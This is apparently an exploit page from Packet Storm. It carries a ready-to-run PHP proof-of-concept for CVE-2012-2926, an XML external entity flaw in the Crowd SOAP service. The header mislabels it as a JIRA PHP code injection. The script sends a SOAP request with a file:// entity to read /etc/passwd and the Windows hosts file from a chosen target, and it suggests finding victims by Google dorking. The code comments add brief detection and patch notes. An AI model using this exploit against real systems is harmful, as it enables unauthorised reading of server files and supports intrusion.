## https://sploitus.com/exploit?id=PACKETSTORM:189530
=============================================================================================================================================
    | # Title     : Atlassian JIRA before 5.0.1 PHP Code Injection Vulnerability                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://developer.atlassian.com/                                                                                            |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] Code Description: A SOAP XML request is generated containing the XXE payload that reads the requested file.
    	
    	( https://packetstorm.news/files/id/181107/ CVE-2012-2926 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 46
    
    [+] Usage : php poc.php
    
    [+] Payload :
    
    <?php
    
    /**
     * Sends one SOAP request to the Crowd services endpoint carrying an XML
     * external entity (XXE) payload and prints whatever the server echoes back.
     *
     * The request body declares a DOCTYPE with a SYSTEM entity pointing at
     * $file and references that entity inside <aut:encryptedCredential>; the
     * server's validation error ("Invalid boolean value: ?...") is expected to
     * contain the expanded entity, i.e. the file contents (CVE-2012-2926, see
     * the page header).
     *
     * Defender notes: a SOAP POST whose body carries a <!DOCTYPE ...> with an
     * external SYSTEM entity is a strong detection signal for this class of
     * request, and the root-cause fix is to disable external entity resolution
     * in the server-side XML parser (or apply the vendor patch).
     *
     * @param string $target host name or IP of the Crowd server
     * @param int    $port   port the SOAP endpoint listens on
     * @param string $file   absolute path on the server, embedded in a file:// URI
     * @param string $os     label used only in the printed result messages
     *
     * Side effects only: echoes the outcome and returns nothing. The result of
     * curl_exec() is not checked for false, so a transport failure ends up in
     * the "Failed to retrieve file" branch rather than being reported as a
     * connection error.
     */
    function exploit_xxe($target, $port, $file, $os) {
        // SOAP endpoint of the Crowd instance being tested (plain HTTP).
        $url = "http://$target:$port/crowd/services";
        
        // The entity name is arbitrary; the SYSTEM identifier is the file:// URI
        // the server-side XML parser is expected to dereference.
        $entity = 'xxetest';
        $payload = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n";
        $payload .= "<!DOCTYPE foo [<!ENTITY $entity SYSTEM \"file://$file\"> ]>\n";
        $payload .= "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n";
        $payload .= "<soapenv:Body>\n";
        $payload .= "<urn:addAllPrincipals xmlns:urn=\"urn:SecurityServer\">\n";
        $payload .= "<urn:in0>\n";
        $payload .= "<aut:name>?</aut:name>\n";
        $payload .= "<aut:token>?</aut:token>\n";
        $payload .= "</urn:in0>\n";
        $payload .= "<urn:in1>\n";
        $payload .= "<soap:SOAPPrincipalWithCredential>\n";
        $payload .= "<soap:passwordCredential>\n";
        // The entity reference sits in a field the server validates; the leading
        // "?" is what the regex below keys on when scanning the error response.
        $payload .= "<aut:encryptedCredential>?&$entity;</aut:encryptedCredential>\n";
        $payload .= "</soap:passwordCredential>\n";
        $payload .= "</soap:SOAPPrincipalWithCredential>\n";
        $payload .= "</urn:in1>\n";
        $payload .= "</urn:addAllPrincipals>\n";
        $payload .= "</soapenv:Body>\n";
        $payload .= "</soapenv:Envelope>";
        
        // HTTP POST of the raw XML; CURLOPT_RETURNTRANSFER makes curl_exec()
        // return the response body as a string instead of printing it.
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            "Content-Type: text/xml; charset=UTF-8",
            "SOAPAction: \"\""
        ]);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        // Success path: the server reflects the expanded entity after
        // "Invalid boolean value: ?"; capture group 1 is printed as the file body.
        if (preg_match('/Invalid boolean value: \?(.*)/m', $response, $matches)) {
            echo "[+] Retrieved file content from $os:\n" . $matches[1] . "\n";
        } else {
            echo "[-] Failed to retrieve file from $os.";
        }
    }
    
    // Configuration: edit these values before running the script.
    $target = "192.168.1.100"; // IP address or host name of the target server
    $port = 8095; // port the Crowd SOAP endpoint listens on
    $file_linux = "/etc/passwd"; // path used for the Linux attempt
    $file_windows = "C:\\Windows\\System32\\drivers\\etc\\hosts"; // path used for the Windows attempt
    
    // Both paths are tried in turn; the fourth argument is only a label for the output.
    exploit_xxe($target, $port, $file_linux, "Linux");
    exploit_xxe($target, $port, $file_windows, "Windows");
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================